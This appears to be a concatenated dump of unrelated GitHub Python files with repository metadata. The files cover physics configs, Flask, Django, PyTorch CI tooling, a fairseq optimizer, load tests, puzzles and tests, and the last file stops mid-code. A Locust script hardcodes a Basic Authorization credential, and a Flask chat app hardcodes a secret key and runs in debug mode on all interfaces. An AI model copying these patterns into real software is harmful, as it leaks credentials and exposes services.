be49460b81c32e70942ea2581bb64a8da075a02b | b91588cda1a129f06aa9493ee6d6a70e4f996b7f | /Production/python/Spring16/SMS-T1tttt_mGluino-1500_mLSP-100_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_cff.py | 3ee5ed60931bbb4ad7c6542352ccff2cb49ba1ca | [] | no_license | muzamilahmad/LeptoQuarkTreeMaker | 2371e93589dbe41b02a93a2533cbf5e955aaa0db | 8e7eed0d03c6770a029eafb9b638e82c600a7425 | refs/heads/master | 2021-01-19T01:02:35.749590 | 2018-02-06T17:27:52 | 2018-02-06T17:27:52 | 65,389,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 945 | py | import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
readFiles.extend( [
'/store/mc/RunIISpring16MiniAODv1/SMS-T1tttt_mGluino-1500_mLSP-100_TuneCUETP8M1_13TeV-madgraphMLM-pythia8/MINIAODSIM/PUSpring16_80X_mcRun2_asymptotic_2016_v3-v1/60000/26C76166-0FFE-E511-BA96-0025905D1D60.root',
'/store/mc/RunIISpring16MiniAODv1/SMS-T1tttt_mGluino-1500_mLSP-100_TuneCUETP8M1_13TeV-madgraphMLM-pythia8/MINIAODSIM/PUSpring16_80X_mcRun2_asymptotic_2016_v3-v1/60000/54D0DC62-1AFE-E511-AF9E-0025905C2CE6.root',
'/store/mc/RunIISpring16MiniAODv1/SMS-T1tttt_mGluino-1500_mLSP-100_TuneCUETP8M1_13TeV-madgraphMLM-pythia8/MINIAODSIM/PUSpring16_80X_mcRun2_asymptotic_2016_v3-v1/60000/C6A56846-FFFD-E511-9207-0025905C2CB8.root',
] )
| [
"kpedro88@gmail.com"
] | kpedro88@gmail.com |
16d8f084b4433e0bb41935d168c212cfd4226d78 | 6a07912090214567f77e9cd941fb92f1f3137ae6 | /cs101/Unit 3/29.py | 5c575716467bd6aff72509a752ed2600fa22f762 | [] | no_license | rrampage/udacity-code | 4ab042b591fa3e9adab0183d669a8df80265ed81 | bbe968cd27da7cc453eada5b2aa29176b0121c13 | refs/heads/master | 2020-04-18T08:46:00.580903 | 2012-08-25T08:44:24 | 2012-08-25T08:44:24 | 5,352,942 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | # cs101 ; Unit 3 ; 29
# Define a procedure, union,
# that takes as inputs two lists.
# It should modify the first input
# list to be the set union of the two
# lists. You may assume the first list
# is a set, that is, it contains no
# repeated elements.
# To test, uncomment all lines
# below except those beginning with >>>.
#a = [1,2,3]
#b = [2,4,6]
#union(a,b)
#print a
#>>> [1,2,3,4,6]
#print b
#>>> [2,4,6]
| [
"raunak1001@gmail.com"
] | raunak1001@gmail.com |
1acd7fc6a279c84694f983315670c8f94cbe2106 | bf52ad6cac5e69a62b141cdf050bffa56f6ab1c9 | /division/app.py | df3d9fca4db57871e10e6271f41753bb35cb99f4 | [] | no_license | diegoguizag1992/ArquitecturaMicroservicios | e931608da6183925e08fa9c066eecdefac3d20f9 | 934b20ec48388dc47634c1b67e06b059eceadd06 | refs/heads/master | 2023-01-14T04:10:23.333673 | 2020-11-23T02:33:17 | 2020-11-23T02:33:17 | 315,170,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | from flask import Flask
app = Flask(__name__)
@app.route("/division/<int:valor1>/<int:valor2>")
def division(valor1, valor2):
return str(valor1 / valor2)
if __name__ == "__main__":
app.run(host='0.0.0.0',debug=True) | [
"apdaza@gmail.com"
] | apdaza@gmail.com |
f25696cb1a246d1155d0461d4f872a23a144f52f | e48f110e638df31129963ff2a6b4dbba44354d33 | /script/parse_xml_tr.py | d6ec02911c3031ccd4fbcc04286e79962dd8bb1b | [] | no_license | didw/kra | dfa6e0f4d305e56fb11255c8af0554767f981d44 | 2d5ac2bcab5a2b452381c433f4c3c10b8b95e94f | refs/heads/master | 2021-01-11T05:50:49.239175 | 2019-01-06T14:22:36 | 2019-01-06T14:22:36 | 72,058,728 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,254 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import pandas as pd
import glob
def parse_xml_tr(meet):
data = []
filename = '../xml/getTR_%d.xml' % meet
file_input = open(filename)
print "process in %s" % filename
response_body = file_input.read()
xml_text = BeautifulSoup(response_body, 'html.parser')
for itemElm in xml_text.findAll('item'):
#print itemElm
try:
data.append([unicode(itemElm.birth.string),
unicode(itemElm.cntt.string),
unicode(itemElm.cnty.string),
unicode(itemElm.trname.string),
unicode(itemElm.ord1t.string),
unicode(itemElm.ord1y.string),
unicode(itemElm.ord2t.string),
unicode(itemElm.ord2y.string),
unicode(itemElm.part.string),
unicode(itemElm.stdate.string)])
except:
pass
df = pd.DataFrame(data)
df.columns = ["birth", "cntT", "cntY", "trName", "ord1T", "ord1Y", "ord2T", "ord2Y", "part", "stDate"]
return df
if __name__ == 'main':
meet = 1
data = parse_xml_tr(meet)
print(data)
| [
"yangjy0113@gmail.com"
] | yangjy0113@gmail.com |
ac29d1a938ea446f3b5cb9bcfabebe28102ba3c6 | e979a08107918af5aae7214cc19927495591cc1d | /demo/Canvas/oval.py | 22e092e4e9b788e7abb795fdf82ef0176c9e7a2e | [] | no_license | jksdou/tkinter-learn | 5b421520bac28736028045c635e78ac364ae134c | 3b19a324e78ce0ce7d5d6f6726e37d2639a60965 | refs/heads/master | 2023-01-22T06:59:03.098433 | 2020-12-07T17:13:06 | 2020-12-07T17:13:06 | 319,378,388 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# 使用 Canvas 画椭圆
from tkinter import Tk, Canvas
window = Tk()
window.title("画椭圆")
window.resizable(False, False)
top = 130
bottom = 130
canvas = Canvas(window, width=500, height=500, bg='white')
for i in range(20):
canvas.create_oval(250 - top, 250 - bottom, 250 + top, 250 + bottom)
top -= 5
bottom += 5
canvas.pack()
window.mainloop()
| [
"doudoudzj@sina.com"
] | doudoudzj@sina.com |
f79cbf0dbb76b761ebc6b09cd7e6840f0ba8bc43 | b969cb8a74e5de2c82cdf795614f4d115e2ed40c | /benchmarks/dynamo/ci_expected_accuracy/update_expected.py | e61d282be558e3344a03c92b36ecfa96fb82e994 | [
"BSD-2-Clause"
] | permissive | vishalbelsare/pytorch | fabd19fff9b1fb4fd2023605540c82f4c1d8a603 | a39ea6f21361e531ce7e703224bfbce7fc564083 | refs/heads/master | 2023-04-30T05:55:06.631379 | 2023-04-17T04:30:36 | 2023-04-17T04:30:36 | 152,814,397 | 0 | 0 | NOASSERTION | 2023-04-17T10:16:58 | 2018-10-12T22:37:31 | C++ | UTF-8 | Python | false | false | 4,734 | py | """
Update commited CSV files used as reference points by dynamo/inductor CI.
Currently only cares about graph breaks, so only saves those columns.
Hardcodes a list of job names and artifacts per job, but builds the lookup
by querying github sha and finding associated github actions workflow ID and CI jobs,
downloading artifact zips, extracting CSVs and filtering them.
Usage:
python benchmarks/dynamo/ci_expected_accuracy.py <sha of pytorch commit that has completed inductor benchmark jobs>
Known limitations:
- doesn't handle 'retry' jobs in CI, if the same hash has more than one set of artifacts, gets the first one
"""
import argparse
import os
import urllib
from io import BytesIO
from urllib.request import urlopen
from zipfile import ZipFile
import pandas as pd
import requests
# Note: the public query url targets this rockset lambda:
# https://console.rockset.com/lambdas/details/commons.artifacts
ARTIFACTS_QUERY_URL = "https://api.usw2a1.rockset.com/v1/public/shared_lambdas/4ca0033e-0117-41f5-b043-59cde19eff35"
def query_job_sha(repo, sha):
params = {
"parameters": [
{"name": "sha", "type": "string", "value": sha},
{"name": "repo", "type": "string", "value": repo},
]
}
r = requests.post(url=ARTIFACTS_QUERY_URL, json=params)
data = r.json()
return data["results"]
def parse_job_name(job_str):
return (part.strip() for part in job_str.split("/"))
def parse_test_str(test_str):
return (part.strip() for part in test_str[6:].strip(")").split(","))
S3_BASE_URL = "https://gha-artifacts.s3.amazonaws.com"
def get_artifacts_urls(results, suites):
urls = {}
for r in results:
if "inductor" == r["workflowName"] and "test" in r["jobName"]:
config_str, test_str = parse_job_name(r["jobName"])
suite, shard_id, num_shards, machine = parse_test_str(test_str)
workflowId = r["workflowId"]
id = r["id"]
runAttempt = r["runAttempt"]
if suite in suites:
artifact_filename = f"test-reports-test-{suite}-{shard_id}-{num_shards}-{machine}_{id}.zip"
s3_url = f"{S3_BASE_URL}/{repo}/{workflowId}/{runAttempt}/artifact/{artifact_filename}"
urls[(suite, int(shard_id))] = s3_url
print(f"{suite} {shard_id}, {num_shards}: {s3_url}")
return urls
def normalize_suite_filename(suite_name):
subsuite = suite_name.split("_")[1]
if "timm" in subsuite:
subsuite = subsuite.replace("timm", "timm_models")
return subsuite
def download_artifacts_and_extract_csvs(urls):
dataframes = {}
try:
for (suite, shard), url in urls.items():
resp = urlopen(url)
subsuite = normalize_suite_filename(suite)
artifact = ZipFile(BytesIO(resp.read()))
for phase in ("training", "inference"):
name = f"test/test-reports/{phase}_{subsuite}.csv"
try:
df = pd.read_csv(artifact.open(name))
prev_df = dataframes.get((suite, phase), None)
dataframes[(suite, phase)] = (
pd.concat([prev_df, df]) if prev_df is not None else df
)
except KeyError:
print(
f"Warning: Unable to find {name} in artifacts file from {url}, continuing"
)
except urllib.error.HTTPError:
print(f"Unable to download {url}, perhaps the CI job isn't finished?")
return dataframes
def write_filtered_csvs(root_path, dataframes):
for (suite, phase), df in dataframes.items():
out_fn = os.path.join(root_path, f"{suite}_{phase}.csv")
df.to_csv(out_fn, index=False, columns=["name", "accuracy", "graph_breaks"])
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("sha")
args = parser.parse_args()
repo = "pytorch/pytorch"
suites = {
"inductor_huggingface",
"inductor_huggingface_dynamic",
"inductor_timm",
"inductor_timm_dynamic",
"inductor_torchbench",
"inductor_torchbench_dynamic",
}
root_path = "benchmarks/dynamo/ci_expected_accuracy/"
assert os.path.exists(root_path), f"cd <pytorch root> and ensure {root_path} exists"
results = query_job_sha(repo, args.sha)
urls = get_artifacts_urls(results, suites)
dataframes = download_artifacts_and_extract_csvs(urls)
write_filtered_csvs(root_path, dataframes)
print("Success. Now, confirm the changes to .csvs and `git add` them if satisfied.")
| [
"pytorchmergebot@users.noreply.github.com"
] | pytorchmergebot@users.noreply.github.com |
0e916354a1d3704471d2be020f245a8c7aa813cd | 421d58c6b93b81e0724f8f4576119300eb344252 | /influencers/influencers/urls.py | b86f901777f8d82d4ed3860d80d1054aed5fd2a7 | [] | no_license | momen/influencers | 7728228c92a552bdff9ae62f85986ad03bce186e | f9c76cfc2970440112967f9579dc31f77063cb25 | refs/heads/master | 2020-06-03T22:20:03.881411 | 2019-06-15T07:48:43 | 2019-06-15T07:48:43 | 191,754,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | from django.urls import path
from rest_framework.routers import DefaultRouter
from influencers.influencers.views import (
InfluencerViewSet,
SocialAccountViewSet,
InfluencerAccountsView,
)
app_name = "influencers"
router = DefaultRouter()
router.register(r"socialaccount", SocialAccountViewSet)
router.register(r"", InfluencerViewSet)
urlpatterns = router.urls
# Append other urls of generic views(Not ViewSet)
urlpatterns += [
path(
"<int:id>/accounts/",
InfluencerAccountsView.as_view(),
name="influencer-accounts",
)
]
| [
"momennegm@gmail.com"
] | momennegm@gmail.com |
8e8438167e9bba3b51f29c3b109269ccb9aedc8e | a98a3cbaf20a844406650ba15705fd6635b097da | /tintg/prod_settings/__init__.py | 320eff557c6462c77d01474723d8a8ce149e6397 | [
"Apache-2.0"
] | permissive | phildini/tintg | 9c34364dda85b4cfe63df9357eb9d58535c7b308 | ad82d94f37b301b5ef8062e472bac52bcfe7ad8f | refs/heads/master | 2021-01-01T05:16:36.439279 | 2016-04-21T18:37:23 | 2016-04-21T18:37:23 | 56,353,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 882 | py | import dj_database_url
from tintg.settings import *
DEBUG = False
TEMPLATE_DEBUG = False
DATABASES['default'] = dj_database_url.parse(get_env_variable('TINTG_DB_URL'))
SECRET_KEY = get_env_variable('TINTG_SECRET_KEY')
ALLOWED_HOSTS = [
'localhost',
'127.0.0.1',
'.herokuapp.com',
]
SECURE_HSTS_SECONDS = 3600
SECURE_FRAME_DENY = True
SECURE_CONTENT_TYPE_NOSNIFF = True
SECURE_BROWSER_XSS_FILTER = True
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_HTTPONLY = True
STATIC_URL = '//tintg.s3.amazonaws.com/assets/'
INSTALLED_APPS += (
'gunicorn',
'opbeat.contrib.django',
)
MIDDLEWARE_CLASSES = (
'opbeat.contrib.django.middleware.OpbeatAPMMiddleware',
) + MIDDLEWARE_CLASSES
OPBEAT = {
'ORGANIZATION_ID': get_env_variable("OPBEAT_ORG_ID"),
'APP_ID': get_env_variable("OPBEAT_APP_ID"),
'SECRET_TOKEN': get_env_variable("OPBEAT_SECRET_KEY"),
} | [
"pjj@philipjohnjames.com"
] | pjj@philipjohnjames.com |
fc304828e5e04612a37bc0ee4c746750d8aaaa54 | fb1e852da0a026fb59c8cb24aeb40e62005501f1 | /edgelm/fairseq/optim/cpu_adam.py | 5c738e42918a371e239d89b8e14b9bd1841175ee | [
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-free-unknown",
"Apache-2.0"
] | permissive | microsoft/unilm | 134aa44867c5ed36222220d3f4fd9616d02db573 | b60c741f746877293bb85eed6806736fc8fa0ffd | refs/heads/master | 2023-08-31T04:09:05.779071 | 2023-08-29T14:07:57 | 2023-08-29T14:07:57 | 198,350,484 | 15,313 | 2,192 | MIT | 2023-08-19T11:33:20 | 2019-07-23T04:15:28 | Python | UTF-8 | Python | false | false | 6,997 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import importlib
from collections.abc import Collection
from dataclasses import dataclass, field
from typing import List
import torch
from fairseq.dataclass import FairseqDataclass
from fairseq.optim import FairseqOptimizer, register_optimizer
from omegaconf import II, DictConfig
try:
import deepspeed
has_deepspeed = True
except ImportError as e:
has_deepspeed = False
def _get_cpu_adam():
try:
from deepspeed.ops.op_builder import CPUAdamBuilder
return CPUAdamBuilder().load()
except ImportError:
# fbcode
from deepspeed.ops.adam import DeepSpeedCPUAdam as ds_opt_adam
return ds_opt_adam
@dataclass
class FairseqCPUAdamConfig(FairseqDataclass):
adam_betas: str = field(
default="(0.9, 0.999)", metadata={"help": "betas for Adam optimizer"}
)
adam_eps: float = field(
default=1e-8, metadata={"help": "epsilon for Adam optimizer"}
)
weight_decay: float = field(default=0.0, metadata={"help": "weight decay"})
fp16_adam_stats: bool = field(
default=False, metadata={"help": "use FP16 stats (with automatic scaling)"}
)
# TODO common vars below in parent
lr: List[float] = II("optimization.lr")
@register_optimizer("cpu_adam", dataclass=FairseqCPUAdamConfig)
class FairseqCPUAdam(FairseqOptimizer):
"""Adam optimizer for fairseq, optimized for CPU tensors.
Important note: this optimizer corresponds to the "AdamW" variant of
Adam in its weight decay behavior. As such, it is most closely
analogous to torch.optim.AdamW from PyTorch.
"""
def __init__(self, cfg: DictConfig, params):
super().__init__(cfg)
self._optimizer = CPUAdam(params, **self.optimizer_config)
@property
def optimizer_config(self):
"""
Return a kwarg dictionary that will be used to override optimizer
args stored in checkpoints. This allows us to load a checkpoint and
resume training using a different set of optimizer args, e.g., with a
different learning rate.
"""
return {
"lr": self.cfg.lr[0]
if isinstance(self.cfg.lr, Collection)
else self.cfg.lr,
"betas": eval(self.cfg.adam_betas),
"eps": self.cfg.adam_eps,
"weight_decay": self.cfg.weight_decay,
"use_fp16_stats": self.cfg.fp16_adam_stats,
}
class CPUAdam(torch.optim.Optimizer):
optimizer_id = 0
def __init__(
self,
params,
lr=1e-3,
bias_correction=True,
betas=(0.9, 0.999),
eps=1e-8,
weight_decay=0,
use_fp16_stats=False,
):
defaults = {
"lr": lr,
"bias_correction": bias_correction,
"betas": betas,
"eps": eps,
"weight_decay": weight_decay,
}
super().__init__(params, defaults)
self.use_fp16_stats = use_fp16_stats
self.FLOAT16_MAX = 65504.0
if not has_deepspeed:
raise ImportError("Please install DeepSpeed: pip install deepspeed")
self.opt_id = CPUAdam.optimizer_id
CPUAdam.optimizer_id = CPUAdam.optimizer_id + 1
self.ds_opt_adam = _get_cpu_adam()
adamw_mode = True
self.ds_opt_adam.create_adam(
self.opt_id, lr, betas[0], betas[1], eps, weight_decay, adamw_mode
)
@property
def supports_memory_efficient_fp16(self):
return True
@property
def supports_flat_params(self):
return True
@torch.no_grad()
def step(self, closure=None):
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
torch.cuda.synchronize()
for group_id, group in enumerate(self.param_groups):
for param_id, p in enumerate(group["params"]):
if p.grad is None:
continue
state = self.state[p]
if len(state) == 0:
state["step"] = 0
dtype = torch.float16 if self.use_fp16_stats else p.data.dtype
# gradient momentums
state["exp_avg"] = torch.zeros_like(
p.data, dtype=dtype, device="cpu"
)
# gradient variances
state["exp_avg_sq"] = torch.zeros_like(
p.data, dtype=dtype, device="cpu"
)
if self.use_fp16_stats:
assert torch.is_floating_point(p.data)
state["exp_avg_scale"] = 1.0
state["exp_avg_sq_scale"] = 1.0
exp_avg, exp_avg_sq = state["exp_avg"], state["exp_avg_sq"]
p_data_bak = p.data # backup of the original data pointer
p.data = p.data.to(dtype=torch.float32, device="cpu")
p.grad.data = p.grad.data.to(dtype=torch.float32, device="cpu")
if self.use_fp16_stats:
exp_avg = exp_avg.float() * state["exp_avg_scale"]
exp_avg_sq = exp_avg_sq.float() * state["exp_avg_sq_scale"]
state["step"] += 1
beta1, beta2 = group["betas"]
self.ds_opt_adam.adam_update(
self.opt_id,
state["step"],
group["lr"],
beta1,
beta2,
group["eps"],
group["weight_decay"],
group["bias_correction"],
p.data,
p.grad.data,
exp_avg,
exp_avg_sq,
)
if p_data_bak.data_ptr() != p.data.data_ptr():
p_data_bak.copy_(p.data)
p.data = p_data_bak
if self.use_fp16_stats:
def inf_norm(t):
return torch.norm(t, float("inf"))
# from github.com/openai/jukebox/blob/master/jukebox/utils/fp16.py
state["exp_avg_scale"], state["exp_avg_sq_scale"] = (
1e-8 + inf_norm(exp_avg) / self.FLOAT16_MAX,
1e-8 + inf_norm(exp_avg_sq) / self.FLOAT16_MAX,
)
state["exp_avg"], state["exp_avg_sq"] = (
(exp_avg / state["exp_avg_scale"]).half(),
(exp_avg_sq / state["exp_avg_sq_scale"]).half(),
)
return loss
| [
"tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net"
] | tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net |
283ffd52d747f154947973d072bee919f2ecc3b4 | 1819b161df921a0a7c4da89244e1cd4f4da18be4 | /WhatsApp_FarmEasy/env/lib/python3.6/site-packages/eth_abi/__init__.py | 7e82401a942db6ef1a962e3df3d8bead7c14f8b3 | [
"MIT"
] | permissive | sanchaymittal/FarmEasy | 889b290d376d940d9b3ae2fa0620a573b0fd62a0 | 5b931a4287d56d8ac73c170a6349bdaae71bf439 | refs/heads/master | 2023-01-07T21:45:15.532142 | 2020-07-18T14:15:08 | 2020-07-18T14:15:08 | 216,203,351 | 3 | 2 | MIT | 2023-01-04T12:35:40 | 2019-10-19T12:32:15 | JavaScript | UTF-8 | Python | false | false | 234 | py | import pkg_resources
from eth_abi.abi import ( # NOQA
decode_abi,
decode_single,
encode_abi,
encode_single,
is_encodable,
is_encodable_type,
)
__version__ = pkg_resources.get_distribution('eth-abi').version
| [
"sanchaymittal@gmail.com"
] | sanchaymittal@gmail.com |
c01f385292ee0918dc05ac627e8ebf46eacdf133 | aae0880c3199c478d5e5cf3cb09a3c81c7d62d6a | /Python-Chat-App/chatup.py | cf08c445d2dbf1f2019f4257b35a86631080e6b4 | [] | no_license | icerahi/rahi-s-Flask-Projects | ca19b302da3d49f8b6d687be1f739032aa5be3ef | 261a5f89434c51ac611297a8d06fb67b89aaebba | refs/heads/master | 2022-01-18T08:15:55.453228 | 2022-01-06T10:04:31 | 2022-01-06T10:04:31 | 177,303,301 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 588 | py | from flask import Flask, render_template
from flask_socketio import SocketIO, emit
app = Flask(__name__)
app.config[ 'SECRET_KEY' ] = 'jsbcfsbfjefebw237u3gdbdc'
socketio = SocketIO( app )
user="rahi"
@app.route( '/')
def hello():
return render_template( './ChatApp.html' ,user=user)
def messageRecived():
print( 'message was received!!!' )
@socketio.on( 'my event' )
def handle_my_custom_event( json ):
print( 'recived my event: ' + str( json ) )
socketio.emit( 'my response', json, callback=messageRecived )
if __name__ == '__main__':
socketio.run( app, debug = True )
| [
"zanjarwhite@gmail.com"
] | zanjarwhite@gmail.com |
736725eed55dde6e46164dd2c288107c859d462b | 7548c8efccb43b1d8daec719bd7d8ad4a4d03630 | /Last Substring in Lexicographical Order/Leetcode_1163.py | b4b376a7fef9cf5bbba987db4d11cb5d17b3de1b | [] | no_license | arw2019/AlgorithmsDataStructures | fdb2d462ded327857d72245721d3c9677ba1617b | 9164c21ab011c90944f844e3c359093ce6180223 | refs/heads/master | 2023-02-17T11:50:07.418705 | 2021-01-19T19:37:17 | 2021-01-19T19:37:17 | 204,222,584 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | class Solution:
def lastSubstring(self, s: str) -> str:
n = len(s)
maxSeen = ""
for i in range(n):
for j in range(i+1, n+1):
if s[i:j] > maxSeen:
maxSeen = s[i:j]
return maxSeen
| [
"noreply@github.com"
] | arw2019.noreply@github.com |
d811b831a0e884d180f0ed6c73ef9be7f7035b4d | 785a06d576cd4f7486a8a4306481392d0b65f621 | /0x03-python-data_structures/7-add_tuple.py | 236d69a2a5ee75720fa955be0a622f52c463ca58 | [] | no_license | LauraPeraltaV85/holbertonschool-higher_level_programming | 7c3d0a99c2dbd4f2f6951999634dbc2ae9acf1c4 | 264fe99bf5fc128d2faf59057e9062c2408e6065 | refs/heads/master | 2021-07-21T07:49:24.049890 | 2020-08-19T00:07:20 | 2020-08-19T00:07:20 | 207,329,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py | #!/usr/bin/python3
def add_tuple(tuple_a=(), tuple_b=()):
x = list(tuple_a)
y = list(tuple_b)
if len(x) < 2:
for e in range(len(x), 2):
x.append(0)
if len(y) < 2:
for e in range(len(y), 2):
y.append(0)
n = [x[0] + y[0], x[1] + y[1]]
return (tuple(n))
| [
"="
] | = |
c15fa2778f95d2ce92f4f32e1f34aacf0e73e8dd | 7d02813987b49c2a69d92b9b2fdf5148af37274f | /case/About_locust/locustfile3.py | e8227e2096b46427177bb2c33ff615d65bc29962 | [] | no_license | xgh321324/api_test | 29e01cbe5f0b7c2df25fb7e781cedf8031140c72 | 2575495baac3ab90adab7a7a85904c38a78dd4b7 | refs/heads/master | 2022-07-23T19:54:39.320828 | 2022-07-02T09:13:35 | 2022-07-02T09:13:35 | 129,185,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,894 | py | #coding:utf-8
from locust import HttpLocust,TaskSet,task
import time
import login_lanting
import Hash
'''测试发表渟说接口的性能'''
#定义用户行为
class User(TaskSet):
#下面是请求头header
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.108 Safari/537.36 2345Explorer/8.0.0.13547',
'Accept-Encoding': 'gzip',
'X-Requested-With': 'XMLHttpRequest',
'Content-Type': 'application/json',
'requestApp': '2',
'requestclient': '2',
'versionForApp': '4.3.1',
'Authorization': 'Basic YXBpTGFudGluZ0BtZWRsYW5kZXIuY29tOkFwaVRobWxkTWxkQDIwMTM=',
'Connection': 'keep-alive'
}
#发布渟说的入参
t = {
"token": login_lanting.auto_login_by_UID(),
"text": '嘻嘻嘻嘻嘻嘻',
"nonce": Hash.get_digit(),
"timestamp":str(int(time.time()))
}
t['sign'] = Hash.get_sign(t)
#加入圈子的入参
d = {
"token":login_lanting.auto_login_by_UID(),
"group_id":"G00006",
"timestamp":str(int(time.time())),
"nonce":Hash.get_digit()
}
d['sign'] = Hash.get_sign(d)
#task()括号中代表执行压测时的比重
@task(1)
def post_word(self):
u'发布文字渟说'
r = self.client.post('/v1/feed/add',headers = self.header,json=self.t)
result = r.json()
#assert r.json()['code'] == 200
@task(1)
def post_artical(self):
u'发布文章接口'
r = self.client.post('/v1/group/add',headers = self.header,json= self.d)
result = r.json()
class Websiteuser(HttpLocust):
task_set = User
#host = 'http://api.feed.sunnycare.cc'
max_wait = 6000
min_wait = 1000
| [
"34511103+xgh321324@users.noreply.github.com"
] | 34511103+xgh321324@users.noreply.github.com |
fc8469818217fe08269351c9fcc98e6cb3e4d0fb | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /mJpjpgxkxvTY4Qbwf_14.py | f645319a6e0d4c6d6b23568699bd65994ac58ed8 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,221 | py | """
Create a function that takes a 5x5 3D list and returns `True` if it has at
least one Bingo, and `False` if it doesn't.
### Examples
bingo_check([
[45, "x", 31, 74, 87],
[64, "x", 47, 32, 90],
[37, "x", 68, 83, 54],
[67, "x", 98, 39, 44],
[21, "x", 24, 30, 52]
]) ➞ True
bingo_check([
["x", 43, 31, 74, 87],
[64, "x", 47, 32, 90],
[37, 65, "x", 83, 54],
[67, 98, 39, "x", 44],
[21, 59, 24, 30, "x"]
]) ➞ True
bingo_check([
["x", "x", "x", "x", "x"],
[64, 12, 47, 32, 90],
[37, 16, 68, 83, 54],
[67, 19, 98, 39, 44],
[21, 75, 24, 30, 52]
]) ➞ True
bingo_check([
[45, "x", 31, 74, 87],
[64, 78, 47, "x", 90],
[37, "x", 68, 83, 54],
[67, "x", 98, "x", 44],
[21, "x", 24, 30, 52]
]) ➞ False
### Notes
Only check for diagnols, horizontals and verticals.
"""
def bingo_check(board):
xs = [(i,j) for i,x in enumerate(board) for j,y in enumerate(x) if y == 'x']
a = [y for x,y in xs]
b = [x for x,y in xs]
return (a.count(a[0]) == 5 or b.count(b[0]) == 5) or all(abs(x[0]-y[0]) == abs(x[1]-y[1]) for x,y in zip(xs, xs[1:]))
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
34cf3416b4a4ed2611d3f51e59388a491836b4e5 | e2a26056efc56aa48522d0d45375b17a9e687c46 | /seismograph/ext/mocker/json_api_mock.py | 5a02a36e227b249cfd748dabf66dc9742d08106f | [] | no_license | pulysak/seismograph | 489f788affb01c3f9f40565ec92c786a319ee11f | 313b74aaa445e8056c732eff3b8cbd6b5692576f | refs/heads/master | 2021-01-18T16:13:07.125954 | 2016-05-06T17:56:34 | 2016-05-06T17:56:34 | 55,637,399 | 0 | 1 | null | 2016-04-06T20:13:53 | 2016-04-06T20:13:53 | null | UTF-8 | Python | false | false | 793 | py | # -*- coding: utf-8 -*-
import re
import json
from .mock import BaseMock
from .base import BaseMockServer
CLEAN_DATA_REGEXP = re.compile(r'^\s{2}|\n|\r$')
FILE_EXTENSIONS = BaseMockServer.__file_extensions__ + ('.json', )
class JsonMock(BaseMock):
__mime_type__ = 'application/json'
__content_type__ = 'application/json'
@property
def body(self):
return json.dumps(self._body)
@property
def json(self):
return self._body
def __on_file__(self, fp):
super(JsonMock, self).__on_file__(fp)
# for pre validation only
self._body = json.loads(
CLEAN_DATA_REGEXP.sub('', self._body),
)
class JsonApiMockServer(BaseMockServer):
__mock_class__ = JsonMock
__file_extensions__ = FILE_EXTENSIONS
| [
"mikhail.trifonov@corp.mail.ru"
] | mikhail.trifonov@corp.mail.ru |
810b327d3d08b2ab36a8903b52b2d06409e9ff01 | 0d37419481a5f3a37d0bbd2c3b1023105c193917 | /tests/loaders/test_factory_command_loader.py | 31cbc65d2e9c0a99b448e93e8c318f6d659606f3 | [
"MIT"
] | permissive | passionsfrucht/cleo | 89e8b4d8595785ac021017815d1d7ebc1fb80da4 | 8dc694ed5ed350403966f93d330654ecb447801b | refs/heads/master | 2023-06-25T20:14:59.578578 | 2021-07-30T15:16:20 | 2021-07-30T15:16:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,151 | py | import pytest
from cleo.commands.command import Command
from cleo.exceptions import CommandNotFoundException
from cleo.loaders.factory_command_loader import FactoryCommandLoader
def command(name: str) -> Command:
command_ = Command()
command_.name = name
return command_
def test_has():
loader = FactoryCommandLoader(
{"foo": lambda: command("foo"), "bar": lambda: command("bar")}
)
assert loader.has("foo")
assert loader.has("bar")
assert not loader.has("baz")
def test_get():
loader = FactoryCommandLoader(
{"foo": lambda: command("foo"), "bar": lambda: command("bar")}
)
assert isinstance(loader.get("foo"), Command)
assert isinstance(loader.get("bar"), Command)
def test_get_invalid_command_raises_error():
loader = FactoryCommandLoader(
{"foo": lambda: command("foo"), "bar": lambda: command("bar")}
)
with pytest.raises(CommandNotFoundException):
loader.get("baz")
def test_names():
loader = FactoryCommandLoader(
